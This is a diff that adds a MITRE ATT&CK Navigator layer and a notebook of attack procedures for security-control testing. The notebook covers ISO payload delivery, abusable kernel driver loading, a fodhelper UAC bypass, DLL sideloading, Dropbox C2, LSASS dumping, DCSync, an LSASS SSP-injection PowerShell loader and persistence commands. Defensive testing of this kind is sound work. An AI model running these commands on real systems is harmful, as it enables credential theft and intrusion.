+            "techniqueID": "T1548.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1548.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1548.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1548.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1548.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1550.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1552.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1553.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1554"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1555"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1555.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1555.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1556.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1557"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1557.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1557.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1557.003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1558"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1558.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1558.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1558.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1558.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1559"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1559.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1559.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1559.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1560"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1560.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1560.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1560.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1561"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1561.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1561.002"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1562"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1562.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1562.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1563"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1563.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1563.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1564.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1565"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1565.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1565.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1565.003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1566"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1566"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1566.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1566.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1566.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1566.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1566.004"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1567"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1567.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1567.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1567.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1567.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1568"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1568.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1568.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1568.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1569"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1569.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1569.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1570"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1571"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1572"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1573"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1573.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1573.002"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1574"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1574.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1574.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1578.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1580"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1583.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1584.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1585"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1585.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1585.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1585.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1586"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1586.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1586.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1586.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1587.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1588.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1589"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1589.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1589.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1589.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1590.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1591.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1592.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1593"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1593.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1593.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1593.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1594"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1595"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1595.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1595.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1595.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1596.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1597"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1597.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1597.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1598.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1599"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1599.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1600"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1600.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1600.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1601"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1601.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1601.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1602"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1602.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1602.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1606"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1606.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1606.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1608.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1609"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1610"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1611"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1612"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1613"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1614"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1614.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1615"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1619"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1620"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1621"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1622"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1647"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1648"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1649"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1650"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1651"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1652"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1653"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1654"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1656"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1657"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1659"
+        }
+    ]
+}
\ No newline at end of file
diff --git a/fs-index-2024/fs-index-2024-v1.0-notebook.md b/fs-index-2024/fs-index-2024-v1.0-notebook.md
new file mode 100644
index 0000000..2ab367d
--- /dev/null
+++ b/fs-index-2024/fs-index-2024-v1.0-notebook.md
@@ -0,0 +1,500 @@
+# General
+
+# Initial Access
+
+## Malicious ISOs - Generic ISO-wrapped payload
+
+ISO archives can be used to deliver malicious payloads while bypassing mark-of-the-web restrictions
+
+Use an ISO to deliver a malicious executable payload
+
+### Prerequisites
+
+1. Payload
+1. ISO containing the payload 
+   1. You can use `mkisofs` to create an ISO:
+   ```
+   bash> mkisofs -J -o {{ iso }} {{ payload }}
+   ```
+
+## MFA Push Spam - General guidance
+
+Push-based MFA systems are susceptible to abuse by attackers because they allow an attacker to send a large volume of MFA requests to a user in order to induce that user to accept the prompt in the hopes it ends the requests.
+
+Spam a target user with MFA approval prompts. Unlike a real-world scenario, this is not meant to test the human response to being inundated with MFA requests but rather the technical security controls for such a situation.
+
+### Guidance
+
+Send at least 10 MFA requests to the target user
+
+### Notes
+
+- If MFA is in place, but it does not use some form of zero-knowledge approval (e.g. push notification accept, SMS accept, etc), then it should be considered a block. For example, if the MFA systems requires entering a one-time code, then it would not be susceptible to this attack and therefore be blocked. If no MFA is enforced, it should be considered not blocked.
+
+## Suspicious connections - General guidance
+
+### Guidance
+
+When using a browser, you can override the user agent string by using an extension. For example:
+
+- Firefox: https://addons.mozilla.org/en-US/firefox/addon/user-agent-string-switcher
+- Chrome: https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg
+
+You can override your source IP by using a VPN running on a VPS hosted in an anomalous geolocation.
+
+## Suspicious connections - General guidance
+
+### Guidance
+
+When using a browser, you can override the user agent string by using an extension. For example:
+
+- Firefox: https://addons.mozilla.org/en-US/firefox/addon/user-agent-string-switcher
+- Chrome: https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg
+
+You can override your source IP by using a VPN running on a VPS hosted in an anomalous geolocation.
+
+# Defense Evasion
+
+## Malicious kernel driver use - load known-abusable driver
+
+Kernel drivers can be used by attackers for a number of malicious activities, including hiding artifacts and tampering with endpoint security tools.
+
+This bypasses the need for attackers to retrieve legitimate code-signing certificates for a driver they wrote.
+
+### Prerequisites
+
+- Local admin
+- A known-abusable driver. Examples: 
+  - **DBUtil_2_3 (SHA256 - 0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5)**
+  - RTCore64 (SHA256 - 01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd)
+  - IQVM64 (SHA256 - 4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b)
+
+### Guidance
+
+Example loading using sc.exe
+
+```
+cmd> sc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\windows\System32\Drivers\{{ sys_file }} displayname= {{ name }}
+```
+
+### Cleanup
+
+- Is using sc.exe, stop and delete the service then restart the machine
+
+### Notes
+
+Drivers can be found in multiple places, including:
+
+- Directly from vendor sites
+- VirusTotal
+- Aggregators like LOLDrivers and KDU
+  - LOLDrivers: https://github.com/magicsword-io/LOLDrivers/tree/main/drivers
+  - KDU: https://github.com/hfiref0x/KDU/
+
+## UAC Bypass - via fodhelper.exe
+
+User Account Control is not a security control but can cause issues with execution when attempting privileged operations
+
+Move to a high-integrity execution context via fodhelper.exe and a Registry modification. Fodhelper.exe is one of many unpatched methods for bypassing UAC.
+
+### Prerequisites
+
+- Split-token admin account
+
+### Guidance
+
+Check for the existence of the target registry key. If it exists, note the value so that it can be restored after execution.
+
+```
+cmd> reg query HKCU\Software\Classes\ms-settings\Shell\Open\command
+```
+
+Modify the registry key and execute fodhelper.exe to obtain an elevated command prompt:
+
+```
+cmd> 
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+c:\windows\system32\fodhelper.exe
+```
+
+### Cleanup
+
+If the registry existed prior to execution, restore its value:
+
+```
+cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v {{ initial_command }} /f
+```
+
+Otherwise, delete the key:
+
+```
+cmd> reg delete HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+```
+
+### References
+
+- https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+- https://4pfsec.com/offensive-windows-fodhelper-exe/
+
+## DLL Side Loading - General guidance
+
+### Notes
+
+- For an up-to-date list of side-loadable DLLs, refer to https://hijacklibs.net/
+
+## DLL Search Order Hijacking - MpCmdRun.exe sideloading
+
+MpCmdRun.exe is susceptible to a DLL sideloading hijack via its dependency on MpClient.dll
+
+### Prerequisites
+
+- A DLL with the appropriate exports called `mpclient.dll`
+  - Use: https://github.com/2XXE-SRA/payload_resources/tree/master/dllsideload/mpclient
+
+### Guidance
+
+Copy `c:\program files\windows defender\mpcmdrun.exe` to the same directory as the `mpclient.dll` payload then run `mpcmdrun.exe`
+
+## Conditional Access Policy Modifications - General guidance
+
+### Notes
+
+- Create a new conditional access policy to avoid modifying production policies. Additionally, consider disabling the policy or setting it to report-only before modifying it. 
+
+# Discovery
+
+# Command and Control
+
+## Remote Assistance Software - General guidance
+
+Access via remote assistance software
+
+Select and use a well-known remote assistance software
+
+### Prerequisites
+
+1. An account for the service
+2. Tool client downloaded and installed
+   1. TeamViewer: https://www.teamviewer.com/
+   2. GoTo Resolve: https://www.goto.com/it-management/resolve
+   3. ConnectWise Control: https://control.connectwise.com/
+
+### Notes
+
+- Where possible, use remote assistance software already in use in the environment
+
+## Remote tool download - General guidance
+
+Transfer tool into environment by downloading from the Internet
+
+### Notes
+
+- The maliciousness level of the binary should align with the intent of the test. For testing signature-based checks, use a known malicious tool, such as Mimikatz. For testing sandboxing or similar network security technologies, use an unknown yet still overtly malicious tool, such as one built around the current attack infrastructure. By default, start with the most malicious choice.
+
+## Web Service C2 - via Dropbox C3 channel
+
+Establish a command-and-control channel via a legitimate web service so that malicious traffic is masked
+
+Use C3's Dropbox channel for command-and-control
+
+### Prerequisites
+
+1. Install and run C3 on a server
+2. Create a Dropbox account 
+3. Create a Dropbox developer app with read/write permissions then copy the access token
+4. Create a Dropbox channel in C3 using the app token
+5. Export a relay payload
+
+### Guidance
+
+Execute the relay payload
+
+### References
+
+1. Example of C3 using Dropbox: https://labs.withsecure.com/publications/attack-detection-fundamentals-c2-and-exfiltration-lab-3
+
+# Credential Access
+
+## LSASS dumping using comsvcs.dll - via rundll32.exe
+
+Use `rundll32.exe` to call the `MiniDump` export from `comsvcs.dll`
+
+### Prerequisites
+
+- Administrator rights
+- SeDebugPrivilege
+
+### Guidance
+
+```
+shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }} full
+```
+
+This command must be run from a shell process that has `SeDebugPrivilege` enabled. 
+PowerShell should work to this end. 
+
+You can acquire `SeDebugPrivilege` for `cmd.exe` by launching it as `SYSTEM` via Sysinternals' `PsExec` (`psexec -sid cmd`). 
+Alternatively, you can use the VBScript file from `modexp`: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ (`cscript procdump.vbs lsass.exe`)
+
+### Cleanup
+
+- Delete the dump file
+
+## DCSync - via Mimikatz
+
+The DCSync attack mimics normal replication behavior between DCs, allowing for remote extraction of credentials
+
+Uses Mimikatz's lsadump::dcsync command
+
+### Prerequisites
+
+- Command execution in the context of an account with Active Directory replication rights
+- User accounts to target
+- Mimikatz binary (https://github.com/gentilkiwi/mimikatz)
+
+### Guidance
+
+```
+mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ target_username }}
+```
+
+### Troubleshooting
+
+If Mimikatz is giving an error of `ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x00002105 (8453)`, try the following:
+
+```
+cmd> klist purge
+cmd> gpupdate /force
+```
+
+## LSASS Security Service Provider - Temporary SSP
+
+Register a Security Service Provider (SSP) for LSASS. This will trigger a DLL load of the SSP into LSASS.
+
+Register an SSP temporarily by calling the AddSecurityPackage() API.
+
+### Prerequisites
+
+- Local administrator 
+- A compiled SSP DLL and a method of calling the AddSecurityPackage() API (e.g. custom exe payload)
+    - SSP source: https://github.com/2XXE-SRA/payload_resources/blob/master/c/lsa_ssp.c
+      - This can be compiled using MinGW via `x86_64-w64-mingw32-gcc -shared -municode -o ssp.dll lsa_ssp.c -lsecur32`
+    - SSP loader: https://github.com/2XXE-SRA/payload_resources/blob/master/powershell/ssp_loader.ps1
+
+### Guidance
+
+Open an administrative PowerShell terminal. 
+
+If using the script linked above, run the following command
+
+```
+PS> .\ssp_loader.ps1 {{ ssp_dll_path }}
+```
+
+If loading manually, first set the path to the compiled SSP DLL into a variable
+
+```
+PS> $DllName = "{{ ssp_dll_path }}"
+```
+
+Then load the SSP into LSASS
+
+```
+PS>
+$DynAssembly = New-Object System.Reflection.AssemblyName('SSPI2')
+$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
+$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SSPI2', $False)
+
+$TypeBuilder = $ModuleBuilder.DefineType('SSPI2.Secur32', 'Public, Class')
+$PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('AddSecurityPackage',
+    'secur32.dll',
+    'Public, Static',
+    [Reflection.CallingConventions]::Standard,
+    [Int32],
+    [Type[]] @([String], [IntPtr]),
+    [Runtime.InteropServices.CallingConvention]::Winapi,
+    [Runtime.InteropServices.CharSet]::Auto)
+
+$Secur32 = $TypeBuilder.CreateType()
+
+if ([IntPtr]::Size -eq 4) {
+    $StructSize = 20
+} else {
+    $StructSize = 24
+}
+
+$StructPtr = [Runtime.InteropServices.Marshal]::AllocHGlobal($StructSize)
+[Runtime.InteropServices.Marshal]::WriteInt32($StructPtr, $StructSize)
+
+$Secur32::AddSecurityPackage($DllName, $StructPtr)
+```
+
+### Cleanup
+
+- The SSP will be removed on system reboot or after manually calling DeleteSecurityPackage()
+
+### References
+
+- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot
+
+# Impact
+
+## GPO Modifications - General guidance
+
+### Notes
+
+- Create a new group policy object to avoid modifying production policies. Additionally, consider disabling the policy before modifying it. 
+
+# Lateral Movement
+
+# Persistence
+
+## Scheduled Task Persistence - via schtasks.exe
+
+Use built-in schtasks.exe to persist by creating a scheduled task
+
+### Guidance
+
+```
+CMD> schtasks /Create /SC DAILY /TN "{{ taskname }}" /TR "{{ command }}" /ST 09:00
+```
+
+### Cleanup
+
+```
+CMD> schtasks /delete /tn "{{ taskname }}" /f
+```
+
+## Windows Service Persistence - via sc.exe
+
+Use built-in sc.exe to persist
+
+### Guidance
+
+```
+CMD> sc create {{ service_name }} binPath= "{{ command }}"
+```
+
+### Cleanup
+
+```
+CMD> sc delete {{ service_name }}
+```
+
+## Persistence in Azure AD - Register a New Device
+
+Register a new device in Azure AD
+
+### Prerequisites
+
+- Azure AD credentials
+- AAD Internals PowerShell module (https://aadinternals.com/aadinternals/#installation)
+  - Install: `PS> install-module aadinternals -scope currentuser`
+  - Import: `PS> import-module aadinternals`
+
+### Guidance
+
+Authenticate to Azure AD and save the token
+
+```
